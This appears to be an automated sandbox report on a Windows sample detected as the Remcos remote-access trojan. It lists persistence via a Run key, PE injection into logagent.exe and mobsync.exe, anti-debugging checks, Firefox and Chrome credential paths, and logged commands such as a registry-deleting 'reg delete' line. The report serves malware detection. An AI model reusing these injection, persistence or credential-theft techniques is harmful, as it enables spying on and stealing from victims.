Code function: 28_2_00745C8B ShellExecuteW,URLDownloadToFileW,

28_2_00745C8B

Source: C:\Windows\SysWOW64\logagent.exe

Code function: 14_2_004163AD OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

14_2_004163AD

Source: C:\Users\user\Desktop\ZfigYV6HXd.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Kkjczlm			Jump to behavior
Source: C:\Users\user\Desktop\ZfigYV6HXd.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Kkjczlm			Jump to behavior

Source: C:\Windows\SysWOW64\logagent.exe

14_2_0040CD09

Source: C:\Users\user\Desktop\ZfigYV6HXd.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Delayed program exit found

Show sources

Source: C:\Windows\SysWOW64\logagent.exe	Code function: 14_2_0040D0B5 Sleep,ExitProcess,		14_2_0040D0B5
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_0074D0B5 Sleep,ExitProcess,		28_2_0074D0B5

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\logagent.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,		14_2_004160DB
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,		28_2_007560DB

Source: C:\Windows\SysWOW64\logagent.exe	Code function: 14_2_0040A012 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	14_2_0040A012
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 14_2_004061C3 FindFirstFileW,FindNextFileW,	14_2_004061C3
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 14_2_0040A22D FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	14_2_0040A22D
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 14_2_004153F5 FindFirstFileW,FindNextFileW,FindNextFileW,	14_2_004153F5
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 14_2_00417754 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,	14_2_00417754
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 14_2_004077EC __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	14_2_004077EC
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 14_2_00446AF9 FindFirstFileExA,	14_2_00446AF9
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_0074A012 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	28_2_0074A012
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_007461C3 FindFirstFileW,FindNextFileW,	28_2_007461C3
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_0074A22D FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	28_2_0074A22D
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_007553F5 FindFirstFileW,FindNextFileW,FindNextFileW,	28_2_007553F5
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_00757754 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,	28_2_00757754
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_007477EC __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	28_2_007477EC
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_00786AF9 FindFirstFileExA,	28_2_00786AF9
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_00747C55 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	28_2_00747C55

Source: C:\Windows\SysWOW64\logagent.exe

Code function: 14_2_0040697D SetEvent,ShellExecuteW,GetLogicalDriveStringsA,StrToIntA,CreateDirectoryW,GetFileAttributesW,DeleteFileW,

14_2_0040697D

Source: C:\Windows\SysWOW64\logagent.exe

Code function: 14_2_0042F727 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

14_2_0042F727

Source: C:\Windows\SysWOW64\logagent.exe

14_2_0040CD09

Source: C:\Windows\SysWOW64\logagent.exe

Code function: 14_2_0040F15D GetProcessHeap,OpenProcess,OpenProcess,OpenProcess,GetCurrentProcessId,OpenProcess,GetCurrentProcessId,OpenProcess,

14_2_0040F15D

Source: C:\Windows\SysWOW64\mobsync.exe

Code function: 28_2_0077CB4E mov eax, dword ptr fs:[00000030h]

28_2_0077CB4E

Source: C:\Users\user\Desktop\ZfigYV6HXd.exe

Code function: 1_3_032F4D2C LdrInitializeThunk,

1_3_032F4D2C

Source: C:\Windows\SysWOW64\logagent.exe	Code function: 14_2_0042F8B9 SetUnhandledExceptionFilter,	14_2_0042F8B9
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 14_2_0042F727 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_0042F727
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 14_2_00436793 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_00436793
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_0076F8B9 SetUnhandledExceptionFilter,	28_2_0076F8B9
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_0076F727 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	28_2_0076F727
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_00776793 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	28_2_00776793
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_0076FD2C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	28_2_0076FD2C

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\ZfigYV6HXd.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: BE0000	Jump to behavior
Source: C:\Users\user\Desktop\ZfigYV6HXd.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: BF0000	Jump to behavior
Source: C:\Users\user\Desktop\ZfigYV6HXd.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 2EA0000	Jump to behavior
Source: C:\Users\user\Desktop\ZfigYV6HXd.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 2EB0000	Jump to behavior
Source: C:\Users\user\Desktop\ZfigYV6HXd.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 2EC0000	Jump to behavior
Source: C:\Users\user\Desktop\ZfigYV6HXd.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: E00000	Jump to behavior
Source: C:\Users\user\Desktop\ZfigYV6HXd.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: E10000	Jump to behavior
Source: C:\Users\user\Desktop\ZfigYV6HXd.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: E20000	Jump to behavior
Source: C:\Users\user\Desktop\ZfigYV6HXd.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: E30000	Jump to behavior
Source: C:\Users\user\Desktop\ZfigYV6HXd.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 10590000	Jump to behavior
Source: C:\Users\user\Desktop\ZfigYV6HXd.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 2E60000	Jump to behavior
Source: C:\Users\user\Desktop\ZfigYV6HXd.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 2E70000	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Memory written: C:\Windows\SysWOW64\mobsync.exe base: 670000	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Memory written: C:\Windows\SysWOW64\mobsync.exe base: 700000	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Memory written: C:\Windows\SysWOW64\mobsync.exe base: 710000	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Memory written: C:\Windows\SysWOW64\mobsync.exe base: 720000	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Memory written: C:\Windows\SysWOW64\mobsync.exe base: 730000	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Memory written: C:\Windows\SysWOW64\mobsync.exe base: 680000	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Memory written: C:\Windows\SysWOW64\mobsync.exe base: 690000	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Memory written: C:\Windows\SysWOW64\mobsync.exe base: 6A0000	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Memory written: C:\Windows\SysWOW64\mobsync.exe base: 6B0000	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Memory written: C:\Windows\SysWOW64\mobsync.exe base: 10590000	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Memory written: C:\Windows\SysWOW64\mobsync.exe base: 6C0000	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Memory written: C:\Windows\SysWOW64\mobsync.exe base: 6D0000	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: DF0000	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 2EA0000	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 2EB0000	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 2EC0000	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 2ED0000	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: E00000	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: E10000	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: E20000	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: E30000	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 10590000	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 2E60000	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 2E70000	Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\ZfigYV6HXd.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 10590000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Memory written: C:\Windows\SysWOW64\mobsync.exe base: 10590000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 10590000 value starts with: 4D5A	Jump to behavior

Contains functionality to inject code into remote processes

Show sources

Source: C:\Windows\SysWOW64\logagent.exe

14_2_0041412B

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Users\user\Desktop\ZfigYV6HXd.exe	Thread created: C:\Windows\SysWOW64\logagent.exe EIP: BE0000	Jump to behavior
Source: C:\Users\user\Desktop\ZfigYV6HXd.exe	Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 2EC0000	Jump to behavior
Source: C:\Users\user\Desktop\ZfigYV6HXd.exe	Thread created: C:\Windows\SysWOW64\logagent.exe EIP: E30000	Jump to behavior
Source: C:\Users\user\Desktop\ZfigYV6HXd.exe	Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 2E70000	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Thread created: C:\Windows\SysWOW64\mobsync.exe EIP: 670000	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Thread created: C:\Windows\SysWOW64\mobsync.exe EIP: 730000	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Thread created: C:\Windows\SysWOW64\mobsync.exe EIP: 6B0000	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Thread created: C:\Windows\SysWOW64\mobsync.exe EIP: 6D0000	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Thread created: C:\Windows\SysWOW64\logagent.exe EIP: DF0000	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 2ED0000	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Thread created: C:\Windows\SysWOW64\logagent.exe EIP: E30000	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 2E70000	Jump to behavior

Source: C:\Windows\SysWOW64\logagent.exe	Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,Sleep,CloseHandle,OpenProcess, \svchost.exe		14_2_0040FAC7
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,Sleep,CloseHandle,OpenProcess, \svchost.exe		28_2_0074FAC7

Source: C:\Users\user\Desktop\ZfigYV6HXd.exe	Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Process created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe	Jump to behavior

Source: C:\Windows\SysWOW64\mobsync.exe

Code function: 28_2_00754F84 StrToIntA,mouse_event,

28_2_00754F84

Source: logagent.exe, 0000000E.00000000.303926845.0000000003820000.00000002.00020000.sdmp, mobsync.exe, 0000001C.00000000.414528465.00000000031F0000.00000002.00020000.sdmp, logagent.exe, 00000020.00000000.422263438.0000000003A30000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: logagent.exe, 0000000E.00000000.303926845.0000000003820000.00000002.00020000.sdmp, mobsync.exe, 0000001C.00000000.414528465.00000000031F0000.00000002.00020000.sdmp, logagent.exe, 00000020.00000000.422263438.0000000003A30000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: logagent.exe, 0000000E.00000000.303926845.0000000003820000.00000002.00020000.sdmp, mobsync.exe, 0000001C.00000000.414528465.00000000031F0000.00000002.00020000.sdmp, logagent.exe, 00000020.00000000.422263438.0000000003A30000.00000002.00020000.sdmp	Binary or memory string: SProgram Managerl
Source: logagent.exe, 0000000E.00000000.303926845.0000000003820000.00000002.00020000.sdmp, mobsync.exe, 0000001C.00000000.414528465.00000000031F0000.00000002.00020000.sdmp, logagent.exe, 00000020.00000000.422263438.0000000003A30000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd,
Source: logagent.exe, 0000000E.00000000.303926845.0000000003820000.00000002.00020000.sdmp, mobsync.exe, 0000001C.00000000.414528465.00000000031F0000.00000002.00020000.sdmp, logagent.exe, 00000020.00000000.422263438.0000000003A30000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\cmd.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Windows\SysWOW64\logagent.exe	Code function: EnumSystemLocalesW,	14_2_0044A1D0
Source: C:\Windows\SysWOW64\logagent.exe	Code function: GetLocaleInfoA,	14_2_0040D1E5
Source: C:\Windows\SysWOW64\logagent.exe	Code function: EnumSystemLocalesW,	14_2_0044A21B
Source: C:\Windows\SysWOW64\logagent.exe	Code function: EnumSystemLocalesW,	14_2_0044A2B6
Source: C:\Windows\SysWOW64\logagent.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	14_2_0044A343
Source: C:\Windows\SysWOW64\logagent.exe	Code function: GetLocaleInfoW,	14_2_004423BA
Source: C:\Windows\SysWOW64\logagent.exe	Code function: GetLocaleInfoW,	14_2_0044A593
Source: C:\Windows\SysWOW64\logagent.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	14_2_0044A6BC
Source: C:\Windows\SysWOW64\logagent.exe	Code function: GetLocaleInfoW,	14_2_0044A7C3
Source: C:\Windows\SysWOW64\logagent.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	14_2_0044A890
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: GetLocaleInfoA,	28_2_0074D1E5
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: EnumSystemLocalesW,	28_2_0078A1D0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: EnumSystemLocalesW,	28_2_0078A21B
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: EnumSystemLocalesW,	28_2_0078A2B6
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	28_2_0078A343
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: GetLocaleInfoW,	28_2_007823BA
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: GetLocaleInfoW,	28_2_0078A593
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	28_2_0078A6BC
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: GetLocaleInfoW,	28_2_0078A7C3
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	28_2_0078A890
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: EnumSystemLocalesW,	28_2_00781ED1
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	28_2_00789F58

Source: C:\Windows\SysWOW64\logagent.exe

Code function: 14_2_0042F9B4 cpuid

14_2_0042F9B4

Source: C:\Windows\SysWOW64\logagent.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\logagent.exe

Code function: 14_2_0041D0EF timeGetSystemTime,

14_2_0041D0EF

Source: C:\Windows\SysWOW64\mobsync.exe

Code function: 28_2_00782C8E _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

28_2_00782C8E

Source: C:\Windows\SysWOW64\logagent.exe

Code function: 14_2_00416D9E GetComputerNameExW,GetUserNameW,

14_2_00416D9E

Stealing of Sensitive Information:

Yara detected Remcos RAT

Show sources

Source: Yara match	File source: 28.2.mobsync.exe.740000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.logagent.exe.10590000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.mobsync.exe.740000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.mobsync.exe.10590000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.mobsync.exe.10590000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.logagent.exe.10590000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.logagent.exe.105919bb.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.logagent.exe.10590000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.logagent.exe.105919bb.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.logagent.exe.105919bb.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.mobsync.exe.105919bb.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.logagent.exe.105919bb.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.mobsync.exe.105919bb.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.logagent.exe.10590000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.519137260.0000000003017000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.520767321.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.436279698.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.417356547.0000000002D18000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.437204734.0000000003297000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.437522537.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.417466186.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: logagent.exe PID: 6224, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mobsync.exe PID: 6232, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: logagent.exe PID: 6200, type: MEMORYSTR

Contains functionality to steal Firefox passwords or cookies

Show sources

Source: C:\Windows\SysWOW64\logagent.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\	14_2_0040A012
Source: C:\Windows\SysWOW64\logagent.exe	Code function: \key3.db	14_2_0040A012
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\	28_2_0074A012
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: \key3.db	28_2_0074A012

Contains functionality to steal Chrome passwords or cookies

Show sources

Source: C:\Windows\SysWOW64\mobsync.exe

Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data

28_2_00749EF4

Remote Access Functionality:

Yara detected Remcos RAT

Show sources

Source: Yara match	File source: 28.2.mobsync.exe.740000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.logagent.exe.10590000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.mobsync.exe.740000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.mobsync.exe.10590000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.mobsync.exe.10590000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.logagent.exe.10590000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.logagent.exe.105919bb.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.logagent.exe.10590000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.logagent.exe.105919bb.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.logagent.exe.105919bb.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.mobsync.exe.105919bb.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.logagent.exe.105919bb.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.mobsync.exe.105919bb.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.logagent.exe.10590000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.519137260.0000000003017000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.520767321.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.436279698.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.417356547.0000000002D18000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.437204734.0000000003297000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.437522537.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.417466186.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: logagent.exe PID: 6224, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mobsync.exe PID: 6232, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: logagent.exe PID: 6200, type: MEMORYSTR

Detected Remcos RAT

Show sources

Source: logagent.exe	String found in binary or memory: Remcos_Mutex_Inj
Source: logagent.exe, 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: fso.DeleteFolder "\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)Unknown exceptionbad castbad locale name: genericiostreamiostream stream errorios_base::badbit setios_base::failbit setios_base::eofbit setlicense_code.txtSoftware\ExeWDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceUserAccess level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWNtUnmapViewOfSectionntdll.dllGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\overridepth_unenc3.2.1 Prov\|
Source: mobsync.exe	String found in binary or memory: Remcos_Mutex_Inj
